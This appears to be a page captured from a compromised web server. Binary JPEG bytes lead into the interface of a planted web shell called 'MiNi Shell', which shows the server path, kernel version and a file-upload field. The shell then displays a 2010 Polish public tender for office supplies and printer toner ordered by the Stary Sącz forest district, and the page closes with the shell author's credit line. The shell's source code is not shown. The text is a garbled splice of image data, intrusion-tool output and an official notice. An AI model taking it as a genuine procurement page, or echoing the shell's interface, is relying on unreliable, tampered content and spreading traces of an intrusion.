JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100727/225720-N-2010.html

<p class="kh_header"><b>Stary Sącz: Dostawa materiałów biurowych, papierniczych
i eksploatacyjnych do drukarek i kserokopiarek
na potrzeby Nadleśnictwa Stary Sącz</b><br>
<b>Numer ogłoszenia: 225720 - 2010; data zamieszczenia: 27.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe Nadleśnictwo Stary Sącz , ul. Magazynowa, 33-340 Stary Sącz, woj. nowosądeckie, tel. 0-18 446 09 91, faks 0-18 446 09 83.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.starysacz.krakow.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych, papierniczych
i eksploatacyjnych do drukarek i kserokopiarek
na potrzeby Nadleśnictwa Stary Sącz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I
1.Papier A4 typu Lyreco Premium  o białości 16 w skali CIE, o gramaturze 80 g/m2 klasy A	Ryza	500
2.Papier A3 typu Lyreco Premium  o białości 16 w skali CIE, o gramaturze 80 g/m2 klasy A	Ryza	5
3.Brulion Format: A4, Oprawa: miękka
Rodzaj: kratka, 96 kartek, Gramatura: 70g/m2	sztuk	50
4.Koperta biurowa,  biała,  samoprzylepna  
z okienkiem  z prawej - DL	sztuk	4000
5.Koperty bezkwasowa format A4	sztuk	5000
6.Koperta biurowa, biała, samoprzylepna, format A4, 	Sztuk	300
7.Koperta biurowa, biała, samoprzylepna, format A5,	Sztuk	200
8.Długopis tradycyjny typu RUSTOR GZ-031 szerokość linii pisania: 0,5 - 0,7 mm, długość linii pisania: 2500 m, korpus długopisu wykonany z matowego tworzywa sztucznego, dokumentalnym tuszem w kolorze niebieskim, czarnym, czerwonym, zielonym gwarantującym długą trwałość zapisu, długość przechowywania długopisu min 5 lat.	Sztuk	500 (200nieb, 200cz, 50czerw, 50ziel)
9.Wkład do długopisu z poz. Nr 8, z dokumentalnym tuszem w kolorze niebieskim, czarnym, czerwonym, zielonym gwarantującym długą trwałość zapisu, tusz odporny na działanie światła i wody, szerokość linii pisania: 0,5 - 0,7 mm, długość linii pisania: 2500 m,	Sztuk	400
10.Spinacze biurowe niklowane dł. 3cm	opak.zb	40
11.Spinacze biurowe niklowane dł. 5 cm	opak.zb	30
12.Zszywacz do 100 kartek 	Sztuk	2
13.Zszywacz  do 50 kart.	Sztuk	5
14.Zszywki stalowe galwanizowane 24/6	opak. zb.	30
15.Segregator z dźwignią, wykonany z PP z popielatą wklejką wewnątrz, z wymienną dwustronną etykietą opisową w kolorze segregatora, z otworem na grzbiecie, wzmocniony metalowymi kantami na dolnych krawędziach (różne kolory), rozmiar A4/80mm	Sztuk	120
16.Obwoluty na dokumenty z folii groszkowej z europerforacją z boku, format A4 	opak. zb.	15
17.Segregator z dźwignią, wykonany z PP z popielatą wklejką wewnątrz, z wymienną dwustronną etykietą opisową w kolorze segregatora, z otworem na grzbiecie, wzmocniony metalowymi kantami na dolnych krawędziach (różne kolory), rozmiar A4/50mm	Sztuk	100
18.Ołówek zwykły	Sztuk	30
19.Obwoluty na dokumenty z folii groszkowej z europerforacją z boku, format A5	Sztuk	3
20.Rolki kasowe termo czułe 110x20 	Sztuk	200
21.Grzbiety 18 mm, do bindowania	Sztuk	40
22.Grzbiety 16 mm, do bindowania	Sztuk	10
23.Grzbiety 12,5 mm, do bindowania	Sztuk	40
24.Grzbiety od 6 do 10 mm, do bindowania	Sztuk	20
25.Grzbiety 14 mm, do bindowania, 	Sztuk	40
26.Taśma bezbarwna samoprzylepna 18/10	Sztuk	20
27.Taśma samoprzylepna 25mm	Sztuk	15
28.Taśma bezbarwna dwustr.	Sztuk	3
29.Notes kostka	bl.	20
30.Gumki do mazania	Sztuk	15
31.Klej biurowy 22g w sztyfcie typu AMOS	Sztuk	40
32.Linijka 30 CM	sztuk	5
33.Pinezki tablicowe	Opak.	10
34.Pinezki srebrne	Opak.	15
35.Korektor do maszyn OPTIMA SP 20	Sztuk	2
36.Korektor w taśmie	Sztuk	10
37.Korektor w długopisie z met. Końcówką typu UNICORRET PEN	Sztuk	3
38.Korektor w płynie z  pędzelkiem	Sztuk	5
39.Tablica korkowa 90/60	Sztuk	1
40.Tablica korkowa 40/60	Sztuk	1
41.Flamastry kpl. 4 szt.	Opak.	10
42.Zeszyt A4/96 twarde okładki 	Sztuk	10
43.Zeszyt 200 kartkowy A4	Sztuk	3
44.Zeszyt 64-(32) kartkowy w kratkę	Sztuk	20
45.Sznurek szpagat - (biały)	Sztuk	14
46.Sznurek pakowy	Opak.	5
47.Tusz do pieczątek zielony	Sztuk	5
48.Tusz czarny do stempli automatycznych	Sztuk	2
49.Poduszka do pieczątek	Sztuk	5
50.Folia do laminowania A 4 op. a  100 ark. 80 gr.	Opak.	3
Część II
1.Toner  do drukarki HP Q6470A org.	Sztuk	3
2.Toner do drukarki HP Q6471A org.	Sztuk	2
3.Toner  do drukarki HP Q6472A org.	Sztuk	2
4.Toner  do drukarki HP Q6473A org.	Sztuk	2
5.Toner  do drukarki HP C4096A org.	Sztuk	5
6.Toner do drukarki HP C4092A org.	Sztuk	2
7.Toner do drukarki HP C92298X  org.	Sztuk	6
8.Toner do drukarki HP CB435A  org.	Sztuk	3
9.CARTRIDGE HP 960C	komplet	8
10.Toner do drukarki kyocera KM 1450 - TK  - 410 Sztuk	10
11.Toner do drukarki kyocera FS 1116 MFP - TK - 110 Sztuk 5
Część III
1.Skoroszyt A4 miękki zawieszkowy, wyposażony w boczną perforacje - wpinany do segregatora, wykonany z ekologicznego polipropylenu, wysuwany dwustronnie zapisywalny pasek brzegowy Sztuk	800
2.Teczka wiązana, bezkwasowa, A4, gramatura 750-800 gram na m2 Sztuk	500
3.Teczki wiązana, A4, mocna z tektury o gramaturze 450 gram na m2 Sztuk	500
4.Blok szkolny w kratkę  A4/100 makul.	Sztuk	40
5.Książka ewidencji wyjść A 4	Sztuk	4
6.Pojemnik tekturowy na akta 	Sztuk	50
7.Bloczek samoprzylepny 75 x 75 mm (100 sztuk w bloczku)	bloczek	30
8.Dziennik korespondencyjny A-4	Sztuk	5
9.Druki- delegacje	bloczek	8
10.Druk KP	bloczek	30
11.Druk KW	bloczek	5
12.Druki - raporty kasowe A4	bloczek	10
13.Druki - raporty kasowe B5 	bloczek	5.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>20%</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.12.50.00-1, 22.80.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany Formularz Ofertowy i asortymentowo-cenowy
2.Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych, na formularzu ofertowym
3.Oświadczenie Wykonawcy w celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych, na formularzu ofertowym
4.Parafowany przez wykonawcę wzór  umowy na formularzu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.starysacz.krakow.lasy.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Stary Sącz
33-340 Stary  Sącz ul. Magazynowa 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2010 godzina 10:00, miejsce: Nadleśnictwo Stary Sącz
33-340 Stary  Sącz ul. Magazynowa 5
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiałów biurowych, papierniczych
i eksploatacyjnych do drukarek i kserokopiarek
na potrzeby Nadleśnictwa Stary Sącz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Papier A4 typu Lyreco Premium  o białości 16 w skali CIE, o gramaturze 80 g/m2 klasy A	Ryza	500
2.Papier A3 typu Lyreco Premium  o białości 16 w skali CIE, o gramaturze 80 g/m2 klasy A	Ryza	5
3.Brulion Format: A4, Oprawa: miękka
Rodzaj: kratka, 96 kartek, Gramatura: 70g/m2	sztuk	50
4.Koperta biurowa,  biała,  samoprzylepna  
z okienkiem  z prawej - DL	sztuk	4000
5.Koperty bezkwasowa format A4	sztuk	5000
6.Koperta biurowa, biała, samoprzylepna, format A4, 	Sztuk	300
7.Koperta biurowa, biała, samoprzylepna, format A5,	Sztuk	200
8.Długopis tradycyjny typu RUSTOR GZ-031 szerokość linii pisania: 0,5 - 0,7 mm, długość linii pisania: 2500 m, korpus długopisu wykonany z matowego tworzywa sztucznego, dokumentalnym tuszem w kolorze niebieskim, czarnym, czerwonym, zielonym gwarantującym długą trwałość zapisu, długość przechowywania długopisu min 5 lat.	Sztuk	500 (200nieb, 200cz, 50czerw, 50ziel)
9.Wkład do długopisu z poz. Nr 8, z dokumentalnym tuszem w kolorze niebieskim, czarnym, czerwonym, zielonym gwarantującym długą trwałość zapisu, tusz odporny na działanie światła i wody, szerokość linii pisania: 0,5 - 0,7 mm, długość linii pisania: 2500 m,	Sztuk	400
10.Spinacze biurowe niklowane dł. 3cm	opak.zb	40
11.Spinacze biurowe niklowane dł. 5 cm	opak.zb	30
12.Zszywacz do 100 kartek 	Sztuk	2
13.Zszywacz  do 50 kart.	Sztuk	5
14.Zszywki stalowe galwanizowane 24/6	opak. zb.	30
15.Segregator z dźwignią, wykonany z PP z popielatą wklejką wewnątrz, z wymienną dwustronną etykietą opisową w kolorze segregatora, z otworem na grzbiecie, wzmocniony metalowymi kantami na dolnych krawędziach (różne kolory), rozmiar A4/80mm	Sztuk	120
16.Obwoluty na dokumenty z folii groszkowej z europerforacją z boku, format A4 	opak. zb.	15
17.Segregator z dźwignią, wykonany z PP z popielatą wklejką wewnątrz, z wymienną dwustronną etykietą opisową w kolorze segregatora, z otworem na grzbiecie, wzmocniony metalowymi kantami na dolnych krawędziach (różne kolory), rozmiar A4/50mm	Sztuk	100
18.Ołówek zwykły	Sztuk	30
19.Obwoluty na dokumenty z folii groszkowej z europerforacją z boku, format A5	Sztuk	3
20.Rolki kasowe termo czułe 110x20 	Sztuk	200
21.Grzbiety 18 mm, do bindowania	Sztuk	40
22.Grzbiety 16 mm, do bindowania	Sztuk	10
23.Grzbiety 12,5 mm, do bindowania	Sztuk	40
24.Grzbiety od 6 do 10 mm, do bindowania	Sztuk	20
25.Grzbiety 14 mm, do bindowania, 	Sztuk	40
26.Taśma bezbarwna samoprzylepna 18/10	Sztuk	20
27.Taśma samoprzylepna 25mm	Sztuk	15
28.Taśma bezbarwna dwustr.	Sztuk	3
29.Notes kostka	bl.	20
30.Gumki do mazania	Sztuk	15
31.Klej biurowy 22g w sztyfcie typu AMOS	Sztuk	40
32.Linijka 30 CM	sztuk	5
33.Pinezki tablicowe	Opak.	10
34.Pinezki srebrne	Opak.	15
35.Korektor do maszyn OPTIMA SP 20	Sztuk	2
36.Korektor w taśmie	Sztuk	10
37.Korektor w długopisie z met. Końcówką typu UNICORRET PEN	Sztuk	3
38.Korektor w płynie z  pędzelkiem	Sztuk	5
39.Tablica korkowa 90/60	Sztuk	1
40.Tablica korkowa 40/60	Sztuk	1
41.Flamastry kpl. 4 szt.	Opak.	10
42.Zeszyt A4/96 twarde okładki 	Sztuk	10
43.Zeszyt 200 kartkowy A4	Sztuk	3
44.Zeszyt 64-(32) kartkowy w kratkę	Sztuk	20
45.Sznurek szpagat - (biały)	Sztuk	14
46.Sznurek pakowy	Opak.	5
47.Tusz do pieczątek zielony	Sztuk	5
48.Tusz czarny do stempli automatycznych	Sztuk	2
49.Poduszka do pieczątek	Sztuk	5
50.Folia do laminowania A 4 op. a  100 ark. 80 gr.	Opak.	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.12.50.00-1, 22.80.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa materiałów biurowych, papierniczych
i eksploatacyjnych do drukarek i kserokopiarek
na potrzeby Nadleśnictwa Stary Sącz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Toner  do drukarki HP Q6470A org.	Sztuk	3
2.Toner do drukarki HP Q6471A org.	Sztuk	2
3.Toner  do drukarki HP Q6472A org.	Sztuk	2
4.Toner  do drukarki HP Q6473A org.	Sztuk	2
5.Toner  do drukarki HP C4096A org.	Sztuk	5
6.Toner do drukarki HP C4092A org.	Sztuk	2
7.Toner do drukarki HP C92298X  org.	Sztuk	6
8.Toner do drukarki HP CB435A  org.	Sztuk	3
9.CARTRIDGE HP 960C	komplet	8
10.Toner do drukarki kyocera KM 1450 - TK  - 410 	Sztuk	10
11.Toner do drukarki kyocera FS 1116 MFP - TK - 110	Sztuk	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.50.00-1, 30.12.51.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa materiałów biurowych, papierniczych
i eksploatacyjnych do drukarek i kserokopiarek
na potrzeby Nadleśnictwa Stary Sącz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Skoroszyt A4 miękki zawieszkowy, wyposażony w boczną perforacje - wpinany do segregatora, wykonany z ekologicznego polipropylenu, wysuwany dwustronnie zapisywalny pasek brzegowy 	Sztuk	800
2.Teczka wiązana, bezkwasowa, A4, gramatura 750-800 gram na m2 Sztuk	500
3.Teczki wiązana, A4, mocna z tektury o gramaturze 450 gram na m2 Sztuk	500
4.Blok szkolny w kratkę  A4/100 makul.	Sztuk	40
5.Książka ewidencji wyjść A 4	Sztuk	4
6.Pojemnik tekturowy na akta 	Sztuk	50
7.Bloczek samoprzylepny 75 x 75 mm (100 sztuk w bloczku)	bloczek	30
8.Dziennik korespondencyjny A-4	Sztuk	5
9.Druki- delegacje	bloczek	8
10.Druk KP	bloczek	30
11.Druk KW	bloczek	5
12.Druki - raporty kasowe A4	bloczek	10
13.Druki - raporty kasowe B5 	bloczek	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8, 22.99.34.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com